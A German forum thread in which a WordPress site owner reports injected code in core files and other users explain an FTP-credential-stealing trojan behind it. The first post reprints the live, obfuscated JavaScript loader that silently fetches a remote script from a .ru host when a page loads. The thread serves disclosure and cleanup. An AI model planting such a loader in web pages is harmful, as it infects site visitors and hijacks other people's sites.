Wordpress: Sicherheitslüche?

[peffianer]

Wordpress: Sicherheitslücke? +Update+

Hallo, mir ist aufgefallen, dass in einige meiner Wordpressinstallationen offensichtlich Wordpress Code eingeschleust wurde.

- Wordpress Version WordPress 2.8.6
- Plugins: Akismet, All in One SEO, Google Analytics Plugin, Google Sitemaps Generator, robots-meta
- keine Dateien auf 777
- wp-admin über .htaccess Zugangskontrolle geschützt
- gehostet auf vielen verschiedenen Servern bei verschiedenen Providern und natürlich auch unterschiedlichen IPs

Fehlermeldung:

Parse error: syntax error, unexpected '<' in /pfad/wp-includes/default-widgets.php on line 1034

Im Quelltext findet sich auch folgendes:

<script>/*GNU GPL*/ try{window.onload = function(){var O12jt180qt93 = document.createElement('s)$^!&c))r^^i$()p$t#&#'.replace(/\!|#|\)|\^|\$|@|&|\(/ig, ''));var Mqkm29u63ck = 'Vnvzrqpl6lqz';O12jt180qt93.setAttribute('type', 't$e(x#(t&@/&j!(a#^v!!a)s&&c&@r(^@i!$p@t^)^'.replace(/\(|\!|&|#|\)|\$|@|\^/ig, ''));O12jt180qt93.setAttribute('src',  'h#^t!^t)p)^:#!@)/(&)/&!w#&u)&&n!($d&)^e&&#$r$&#g$!r$(o)u&n!#(d($(-$c^#o@$m@@!.$^b&)@e$b#o(&!$.)@$&c$o!m).@$(y$^$)a&$#-^!r$!u!@.(t#h#)$e$^(m!$o!$)b@i!^s#i#@(t&&#e!&$.^(r$(u$((:)8!(0@!^8)0#(&!$/&)c#&)^o!)#^m)d$&i)r@e)@c&!&#t!).)!$)d$!e&^^)/)$c!$@#o!@@m)d#i@r)#!e^@)c)()t$@.$&d&^e#!/#)^s$@y(^$m&#)a&#@n#t@#@(e@$(c^.)##c^(o)m$/(g(o@((#o#g#)^^l@$@e(#.@(#c^$(o((^(m@)&&/!c!#n&z&^z&.^^^^#c^)@o(#&m^&&#/^)$'.replace(/\$|\)|\^|@|&|\!|#|\(/ig, ''));O12jt180qt93.setAttribute('defer', 'd(@$e&(&!f)$e$!r$(#@'.replace(/@|\)|\$|&|#|\^|\(|\!/ig, ''));O12jt180qt93.setAttribute('id', 'Z(q$4&#(!@5&!3^(^t&^o#t$5()j#$2#f&((j$#@@9!)'.replace(/#|\$|\!|\(|@|\^|\)|&/ig, ''));document.body.appendChild(O12jt180qt93);}} catch(Xy0qtz6vuvi) {}</script>
<!--5ae0061466ca3df3d67de6c523e9015b-->
<!--5ae0061466ca3df3d67de6c523e9015b-->
<!--5ae0061466ca3df3d67de6c523e9015b-->
<!--5ae0061466ca3df3d67de6c523e9015b-->
<!--5ae0061466ca3df3d67de6c523e9015b-->
<!--5ae0061466ca3df3d67de6c523e9015b-->
<!--5ae0061466ca3df3d67de6c523e9015b-->
<!--5ae0061466ca3df3d67de6c523e9015b-->
<!--5ae0061466ca3df3d67de6c523e9015b-->
<!--5ae0061466ca3df3d67de6c523e9015b-->
<!--5ae0061466ca3df3d67de6c523e9015b-->

Behebung
Das ganze kann man beheben, in dem man die Dateien

- default-filters.php
- default-widgets.php

in wp-includes neu hochlädt. Diese Dateien wurden auch gestern am 28.12. offensichtlich überschrieben.

Bei einer Google-Suche nach der Fehlermeldung wird deutlich, dass auch andere Leute das Problem haben: Google


Und ich hab mich schon gewundert, warum die Einnahmen heute so gering waren -.-


~ Update.

Das Problem liegt wohl nicht an Wordpress. Es sieht nach einer serverseitigen Sicherheitslücke aus, denn bei mir ist auch eine kleine Miniseite betroffen, die kein Wordpress verwendet.
Für mich gibt es dafür 2 Erklärungen:

1. Reihenweise Server bei verschiedenen Providern gehackt
2. Malware im Umlauf, die FTP Zugangsdaten loggt und dann die Änderungen an den Dateien vornimmt


Kennt sich hier jemand mit JavaScript aus und kann mir sagen, was der oben genannte Code anstellt?

 

[diablo]

Moin,
und du fragst dich nicht, wie das passieren konnte?
Du behebst das Problem ja nicht indem du die PHP-Files neu hochlädst.
Was machst du wenn das wieder passiert?

 

[peffianer]

Dieser Thread ist dazu gedacht, andere darauf aufmerksam zu machen und ich stelle mir schon die Frage woran das liegen könnte. Ansonsten hätte ich mir ja nicht die Mühe mit diesem Thread gemacht. Habe jetzt per Skript erstmal alles wiederherstellen lassen. Die Projekte müssen ja schnell wieder erreichbar sein (Einnahmen und ichwill ja nicht aus dem Index fliegen). Bei einer Installation habe ich alles so gelassen. Ich werde jetzt die Serverlogs etc überprüfen lassen.
Ich kann nicht verstehen, wie sowas passieren kann, vor allem weil offensichtlich keien Schreibrechte für die Dateien vorhanden sind. Könnte an einem Widget liegen wo es eine Lücke gibt, an einem Plugin, oder sonst was.

 

[coder]

Das Spiel mit diesem Virus läuft anders herum:

Du besuchst eine befallene Website und fängst Dir den Virus ein. Er nistet sich in Deinem Windows-PC ein im Autostart (Programm: siszyd32.exe). Von dort aus untersucht er Deine FTP-Programme auf gespeicherte Zugangsdaten und befällt damit Deine Websites.

Daher waren auch plötzlich alle Deine Websites bei verschiedenen Hostern befallen.

Also: Zunächst den eigenen PC säubern, dann die FTP-Zugangsdaten ändern und nicht mehr speichern und dann die Websites säubern.

Mehr zum Virus findest Du, wenn Du nach siszyd32.exe googelst.